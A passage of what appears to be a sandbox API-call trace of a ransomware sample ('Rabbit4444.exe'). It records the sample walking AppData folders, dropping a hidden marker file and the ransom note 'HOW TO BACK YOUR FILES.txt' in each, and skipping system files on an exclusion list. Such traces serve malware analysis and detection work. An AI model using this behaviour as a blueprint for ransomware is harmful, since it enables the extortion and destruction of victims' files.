returned 1 [0054.144] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.144] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9969ff2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9969ff2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9990287, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.144] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.144] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.144] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9969ff2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9969ff2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9990287, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0054.144] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0054.144] lstrcpyW (in: lpString1=0x130eba8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.144] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\collab\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.144] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.144] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.145] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.145] CloseHandle (hObject=0x278) returned 1 [0054.145] CloseHandle (hObject=0x27c) returned 1 [0054.145] GetCurrentThreadId () returned 0xd98 [0054.145] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6570 [0054.145] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0054.145] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10b740 | out: hHeap=0xe0000) returned 1 [0054.145] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6568 | out: hHeap=0xe0000) returned 1 [0054.145] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0054.145] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\" [0054.145] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\.BFC0E91B00AE8A0620D3" [0054.145] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.147] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.150] FlushFileBuffers (hFile=0x27c) returned 1 [0054.151] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.151] CloseHandle (hObject=0x27c) returned 1 [0054.152] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned 32 [0054.152] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.152] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x34f2b3d6, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb373310b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe9990287, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0054.152] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.152] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.152] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.152] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.152] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x34f2b3d6, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb373310b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe9990287, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.152] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.152] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.152] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.152] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.152] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.152] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9990287, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9990287, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9990287, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.152] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.152] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.152] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7157dbce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7157dbce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7157dbce, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0054.152] lstrcmpiW (lpString1="Adobe", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.152] lstrcmpiW (lpString1="Adobe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.152] lstrcmpiW (lpString1="Adobe", lpString2="Rabbit4444.exe") returned -1 [0054.152] lstrcmpiW (lpString1="Adobe", lpString2=".") returned 1 [0054.152] lstrcmpiW (lpString1="Adobe", lpString2="..") returned 1 [0054.152] lstrcmpiW (lpString1="Adobe", lpString2="windows") returned -1 [0054.152] lstrcmpiW (lpString1="Adobe", lpString2="bootmgr") returned -1 [0054.152] lstrcmpiW (lpString1="Adobe", lpString2="pagefile.sys") returned -1 [0054.152] lstrcmpiW (lpString1="Adobe", lpString2="boot") returned -1 [0054.152] lstrcmpiW (lpString1="Adobe", lpString2="ids.txt") returned -1 [0054.152] lstrcmpiW (lpString1="Adobe", lpString2="NTUSER.DAT") returned -1 [0054.152] lstrcpyW (in: lpString1=0x130eb7a, lpString2="Adobe" | out: lpString1="Adobe") returned="Adobe" [0054.152] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6668 [0054.153] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x4e) returned 0x10cd98 [0054.153] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6670 | out: ListHead=0xf68b0, ListEntry=0xf6670) returned 0xf6510 [0054.153] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xdfedb1f6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x63cde605, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x63cde605, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0054.153] lstrcmpiW (lpString1="Microsoft", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.153] lstrcmpiW (lpString1="Microsoft", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.153] lstrcmpiW (lpString1="Microsoft", lpString2="Rabbit4444.exe") returned -1 [0054.153] lstrcmpiW (lpString1="Microsoft", lpString2=".") returned 1 [0054.153] lstrcmpiW (lpString1="Microsoft", lpString2="..") returned 1 [0054.153] lstrcmpiW (lpString1="Microsoft", lpString2="windows") returned -1 [0054.153] lstrcmpiW (lpString1="Microsoft", lpString2="bootmgr") returned 1 [0054.153] lstrcmpiW (lpString1="Microsoft", lpString2="pagefile.sys") returned -1 [0054.153] lstrcmpiW (lpString1="Microsoft", lpString2="boot") returned 1 [0054.153] lstrcmpiW (lpString1="Microsoft", lpString2="ids.txt") returned 1 [0054.153] lstrcmpiW (lpString1="Microsoft", lpString2="NTUSER.DAT") returned -1 [0054.153] lstrcpyW (in: lpString1=0x130eb7a, lpString2="Microsoft" | out: lpString1="Microsoft") returned="Microsoft" [0054.153] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft", dwFileAttributes=0x2010) returned 1 [0054.153] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63e8 [0054.153] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x56) returned 0x115c28 [0054.153] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63f0 | out: ListHead=0xf68b0, ListEntry=0xf63f0) returned 0xf6670 [0054.153] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfdd2edaa, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7275453, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x7275453, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0054.153] lstrcmpiW (lpString1="Mozilla", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.153] lstrcmpiW (lpString1="Mozilla", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.153] lstrcmpiW (lpString1="Mozilla", lpString2="Rabbit4444.exe") returned -1 [0054.153] lstrcmpiW (lpString1="Mozilla", lpString2=".") returned 1 [0054.153] lstrcmpiW (lpString1="Mozilla", lpString2="..") returned 1 [0054.153] lstrcmpiW (lpString1="Mozilla", lpString2="windows") returned -1 [0054.153] lstrcmpiW (lpString1="Mozilla", lpString2="bootmgr") returned 1 [0054.154] lstrcmpiW (lpString1="Mozilla", lpString2="pagefile.sys") returned -1 [0054.154] lstrcmpiW (lpString1="Mozilla", lpString2="boot") returned 1 [0054.154] lstrcmpiW (lpString1="Mozilla", lpString2="ids.txt") returned 1 [0054.154] lstrcmpiW (lpString1="Mozilla", lpString2="NTUSER.DAT") returned -1 [0054.154] lstrcpyW (in: lpString1=0x130eb7a, lpString2="Mozilla" | out: lpString1="Mozilla") returned="Mozilla" [0054.154] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6408 [0054.154] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x52) returned 0x115628 [0054.154] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6410 | out: ListHead=0xf68b0, ListEntry=0xf6410) returned 0xf63f0 [0054.154] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07402a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb07402a4, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0054.154] lstrcmpiW (lpString1="Sun", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.154] lstrcmpiW (lpString1="Sun", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.154] lstrcmpiW (lpString1="Sun", lpString2="Rabbit4444.exe") returned 1 [0054.154] lstrcmpiW (lpString1="Sun", lpString2=".") returned 1 [0054.154] lstrcmpiW (lpString1="Sun", lpString2="..") returned 1 [0054.154] lstrcmpiW (lpString1="Sun", lpString2="windows") returned -1 [0054.154] lstrcmpiW (lpString1="Sun", lpString2="bootmgr") returned 1 [0054.154] lstrcmpiW (lpString1="Sun", lpString2="pagefile.sys") returned 1 [0054.154] lstrcmpiW (lpString1="Sun", lpString2="boot") returned 1 [0054.154] lstrcmpiW (lpString1="Sun", lpString2="ids.txt") returned 1 [0054.154] lstrcmpiW (lpString1="Sun", lpString2="NTUSER.DAT") returned 1 [0054.154] lstrcpyW (in: lpString1=0x130eb7a, lpString2="Sun" | out: lpString1="Sun") returned="Sun" [0054.154] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63a8 [0054.154] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x4a) returned 0x10d3f8 [0054.154] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63b0 | out: ListHead=0xf68b0, ListEntry=0xf63b0) returned 0xf6410 [0054.154] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07402a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb07402a4, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0054.154] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0054.154] lstrcpyW (in: lpString1=0x130eb7a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.154] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.155] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.155] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.156] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.156] CloseHandle (hObject=0x278) returned 1 [0054.156] CloseHandle (hObject=0x27c) returned 1 [0054.156] GetCurrentThreadId () returned 0xd98 [0054.156] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63b0 [0054.156] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun" [0054.156] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10d3f8 | out: hHeap=0xe0000) returned 1 [0054.156] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63a8 | out: hHeap=0xe0000) returned 1 [0054.156] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun" [0054.156] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\" [0054.156] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\.BFC0E91B00AE8A0620D3" [0054.156] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.159] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.161] FlushFileBuffers (hFile=0x27c) returned 1 [0054.162] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.162] CloseHandle (hObject=0x27c) returned 1 [0054.163] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun") returned 36 [0054.163] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.163] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07402a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe99b690f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0054.163] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.163] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.163] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.163] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.163] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07402a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe99b690f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.163] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.163] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.163] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.163] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.163] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.163] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe99b690f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe99b690f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe99b690f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.163] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.163] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.163] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07402a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb07402a4, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0054.163] lstrcmpiW (lpString1="Java", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.163] lstrcmpiW (lpString1="Java", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.163] lstrcmpiW (lpString1="Java", lpString2="Rabbit4444.exe") returned -1 [0054.163] lstrcmpiW (lpString1="Java", lpString2=".") returned 1 [0054.163] lstrcmpiW (lpString1="Java", lpString2="..") returned 1 [0054.163] lstrcmpiW (lpString1="Java", lpString2="windows") returned -1 [0054.163] lstrcmpiW (lpString1="Java", lpString2="bootmgr") returned 1 [0054.164] lstrcmpiW (lpString1="Java", lpString2="pagefile.sys") returned -1 [0054.164] lstrcmpiW (lpString1="Java", lpString2="boot") returned 1 [0054.164] lstrcmpiW (lpString1="Java", lpString2="ids.txt") returned 1 [0054.164] lstrcmpiW (lpString1="Java", lpString2="NTUSER.DAT") returned -1 [0054.164] lstrcpyW (in: lpString1=0x130eb82, lpString2="Java" | out: lpString1="Java") returned="Java" [0054.164] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0054.164] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x54) returned 0x115748 [0054.164] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6410 [0054.164] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07402a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb07402a4, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 0 [0054.164] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0054.164] lstrcpyW (in: lpString1=0x130eb82, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.164] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.165] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.165] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.165] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.165] CloseHandle (hObject=0x278) returned 1 [0054.165] CloseHandle (hObject=0x27c) returned 1 [0054.165] GetCurrentThreadId () returned 0xd98 [0054.165] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0054.165] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java" [0054.165] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115748 | out: hHeap=0xe0000) returned 1 [0054.165] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0054.165] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java" | out: 